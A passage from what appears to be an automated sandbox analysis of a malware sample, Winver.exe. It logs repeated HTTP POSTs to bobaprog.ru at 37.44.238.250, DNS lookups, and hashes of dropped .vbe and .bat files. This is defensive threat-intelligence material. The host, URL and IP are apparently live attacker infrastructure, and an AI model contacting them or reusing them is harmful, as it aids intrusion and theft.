        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:30 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:31 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:32 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:33 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:34 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:36 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:37 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:38 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:39 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:40 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:41 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:43 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:44 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:45 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:46 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:47 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:48 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:50 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:09 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-us
        DNS
        250.238.44.37.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        250.238.44.37.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        83.210.23.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        83.210.23.2.in-addr.arpa
        IN PTR
        Response
        83.210.23.2.in-addr.arpa
        IN PTR
        a2-23-210-83deploystaticakamaitechnologiescom
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • 37.44.238.250:80
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        http
        Winver.exe
        337.8kB
        43.6kB
        461
        294

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
      • 37.44.238.250:80
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        http
        Winver.exe
        2.4kB
        545 B
        7
        5

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        232.168.11.51.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        232.168.11.51.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      • 8.8.8.8:53
        136.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        136.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        209.205.72.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        209.205.72.20.in-addr.arpa

      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        bobaprog.ru
        dns
        Winver.exe
        57 B
        73 B
        1
        1

        DNS Request

        bobaprog.ru

        DNS Response

        37.44.238.250

      • 8.8.8.8:53
        250.238.44.37.in-addr.arpa
        dns
        72 B
        150 B
        1
        1

        DNS Request

        250.238.44.37.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        15.164.165.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        15.164.165.52.in-addr.arpa

      • 8.8.8.8:53
        83.210.23.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        83.210.23.2.in-addr.arpa

      • 8.8.8.8:53
        172.214.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.214.232.199.in-addr.arpa

      • 8.8.8.8:53
        43.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        43.229.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe

        Filesize

        222B

        MD5

        8decf43a92645d8ba4b81696c5e7b1ae

        SHA1

        dcc9ca8b24e3adf7568eb0f6b7f5cd27f039faf6

        SHA256

        6ad34bd4e803fad802052423aeab64f4c60dd3ee55a3167425b9640ae24bfea1

        SHA512

        72e44773f484d2e69ebd41cc555d9a57c833b3930e1f3b0326c90882035e0dc5fb54e8d4ded22cf9f2d28fb502b37b133b7c1c9f9d89b8c21857b569c51ebc17

      • C:\ESD\Winver.exe

        Filesize

        1.8MB

        MD5

        d9ce1032fee5365065a78bbff7267883

        SHA1

        4c7471b47d4151908dd204303421d7c64cf4c5c6

        SHA256

        65d26e7c0b856832e88efefe5c2a9e767fb2a7345715bbd0a6e10f9ac2afb520

        SHA512

        0455364fa91c07da6fecbfb3e3fdbbbcb909e3176b5b151e3653f8b8ebffc02e14fb3471245df479b83f90cd2e1142bcff82b80555cfb3df113696b2925d9435

      • C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat

        Filesize

        57B

        MD5

        d1a4f1e326e7dfca62327ea69446dc7c

        SHA1

        253e264c90cbd15836d8c3a1eab3c26756d94047

        SHA256

        ea091556a5dbab314a6029817a9db64f9b8adc7afb476bbbb11aec0c227f0de2

        SHA512

        3d4624c169297b50329a4e13f3f559a7a1f02112f6482e45cfba747dad11c6e6642f1411cec5e92d7890f86fb38702f48c75fec4d24332d43484ad7b9dbf29c8

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Winver.exe.log

        Filesize

        1KB

        MD5

        af6acd95d59de87c04642509c30e81c1

        SHA1

        f9549ae93fdb0a5861a79a08f60aa81c4b32377b

        SHA256

        7521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6

        SHA512

        93ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a

      • C:\Users\Admin\AppData\Local\Temp\QXQBc8FYJD.bat

        Filesize

        193B

        MD5

        10d98b37f07519f397acd6d439c4b63f

        SHA1

        7bfef0a1e7c93bafc79e67d9ec23986c7fba65ca

        SHA256

        7ae9767117d6a3bbb1c3f839a3298a45dedd60fe4b4113a8432d64fa58e1721e

        SHA512

        6fda622d76a94145220902c45c9257ba11fdc7f68ba8ee3f56670f561fbc0b566868da1292842f3711a8960727f0cb1c3f68a8ec70967048b287eb10bec235ef

      • memory/1404-17-0x0000000002D40000-0x0000000002D5C000-memory.dmp

        Filesize

        112KB

      • memory/1404-15-0x0000000002CC0000-0x0000000002CCE000-memory.dmp

        Filesize

        56KB

      • memory/1404-18-0x000000001BBE0000-0x000000001BC30000-memory.dmp

        Filesize

        320KB

      • memory/1404-20-0x0000000002D60000-0x0000000002D78000-memory.dmp

        Filesize

        96KB

      • memory/1404-37-0x000000001BE70000-0x000000001BF19000-memory.dmp

        Filesize

        676KB

      • memory/1404-38-0x000000001C320000-0x000000001C4C9000-memory.dmp

        Filesize

        1.7MB

